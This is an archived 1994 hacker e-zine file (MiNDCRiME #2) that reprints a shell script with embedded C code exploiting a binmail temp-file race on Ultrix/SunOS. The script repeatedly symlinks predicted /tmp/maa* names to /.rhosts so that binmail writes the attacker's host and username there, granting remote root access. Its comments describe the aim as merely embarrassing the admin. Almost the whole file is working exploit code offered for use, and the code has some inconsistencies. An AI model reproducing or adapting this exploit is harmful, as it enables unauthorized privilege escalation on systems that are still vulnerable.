gemini - kennedy.gemi.dev

💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › MINDCRIME › mc-02.txt captured on 2022-06-12 at 13:14:30.
View Raw
More Information
-=-=-=-=-=-=-
=================================[MiNDCRiME]==================================
[FiLE #2:]
 
[Here's the latest binmail script. I don't know how many of you have it, 
but here it is. This is courtesy of zomo. ]
 
From zomo@narqlinq.net23.com Sat Oct  8 10:28:21 1994
Date: Sat, 8 Oct 1994 10:01:48 -0500
From: zomo@narqlinq.net23.com
 
#!/bin/sh 
# 
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts 
# to embarrass the admin, by creating an motd entry.
#
# Written 1994 by Nate Lawson <nlawson@galaxy.calpoly.edu>
# Minor Revisions by Chris Ellwood <cellwood@gauss.calpoly.edu>
# Thanks go to 8lgm for the basic script format.
 
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS
PROG="`basename $0`"
ME="`whoami`"
PWENT="`hostname` `whoami`"
 
cat > race.c << 'EOF'
 
#define TARGET "/.rhosts"
 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
 
int main( ac,av)  int ac; char **av;
{
        unsigned int pid,bpid;  /* Some machines don't have pid_t */
        int i;
        char target[13];
        strcpy (target,"/tmp/maa");  
                /* General format for binmail temp names */
 
                if ((pid = fork())==0) { 
                   sleep (2);
                   nice (19);  /* Increase our chances and ... */
                   execl ("/bin/mail","mail",0); /* Fork binmail */
                }
 
        bpid=pid;  /* back up our pid for a later time */
 
        for (i=11;i>=8;i--) {
           target[i]=(pid%10) + '0'; 
                /* Make the name for the tempfile */
                pid /= 10;
        }
        while (!symlink(TARGET,target)) unlink (target); 
                /* Point that mktemp()'d file to the pot of gold */
        while (symlink(TARGET,target)) unlink (target); 
                /* Probably not necessary, but what the heck */
 
        kill(bpid,1);  /* Clean up, don't want to lag the system */     
}
 
EOF
 
cc -O -s -o race race.c
 
# Check we now have race
if [ ! -x "race" ]; then
        echo "$PROG: couldnt compile race.c - lame!"
        exit 1
fi
 
OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
NEW_TARGET_LEN=$OLD_TARGET_LEN
 
cp /usr/spool/mail/$ME /tmp/$          # Backup the mail spool.. we need it
cp /dev/null /usr/spool/mail/$ME
echo ""  >> /usr/spool/mail/$ME
echo $PWENT >> /usr/spool/mail/$ME
echo ""  >> /usr/spool/mail/$ME
 
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
     ./race &
     RACE_PID=$!
     sleep 4
     NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
     kill -9 $RACE_PID
done
 
# We won the race
echo "Succeeded.."
# Add back our spool.. don't want to lose our mail.
cp /dev/null /usr/spool/$ME
cp /tmp/$ /usr/spool/mail/$ME  
rm -f /tmp/$ race race.c
exit 0
 
=================================[MiNDCRiME]==================================